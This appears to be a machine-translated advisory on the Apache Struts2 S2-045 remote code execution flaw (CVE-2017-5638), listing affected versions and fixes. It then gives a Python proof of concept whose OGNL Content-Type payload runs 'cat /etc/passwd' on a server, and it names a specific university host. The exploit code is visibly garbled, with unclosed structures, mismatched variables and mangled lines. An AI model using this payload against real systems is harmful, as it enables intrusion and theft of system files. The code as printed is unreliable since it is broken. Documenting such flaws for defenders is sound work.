Mar 07, 2017

Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)






FreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported.
Apache Struts is a United States Apache(the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework.
Vulnerability number
Vulnerability description
The Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution.
In fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it.
The scope of the impact
The Struts 2.3.5 – Struts 2.3.31
The Struts 2.5 – Struts 2.5.10
If you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver.
Vulnerability PoC
#! /usr/bin/env python


import urllib2
import sys
from poster. encode import multipart_encode
from poster. streaminghttp import register_openers
header1 ={
“Host”:“alumnus. shu. edu. cn”,
“Refer”:“alumnus. shu. edu. cn”,
def poc():
datagen, headers = multipart_encode({“image1”: open(“tmp.txt”, “rb”)})
header[“User-Agent”]=“Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36”
(#[email protected]@DEFAULT_MEMBER_ACCESS).
(#_memberAccess? (#_memberAccess=#dm):
((#container=#context[‘com. opensymphony. xwork2. ActionContext. container’]).
(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()).
(#context. setMemberAccess(#dm)))). (#cmd=‘cat /etc/passwd’).
(#iswin=(@java.lang.System@getProperty(‘os. name’). toLowerCase(). contains(‘win’))).
(#cmds=(#iswin? {‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,‘-c’,#cmd})).
(#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)).
(#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse().
getOutputStream())). ( getInputStream(),#ros)).
(#ros. flush())}”’
request = urllib2. Request(str(sys. argv[1]),datagen,headers=header)
response = urllib2. urlopen(request)
print the response. read()
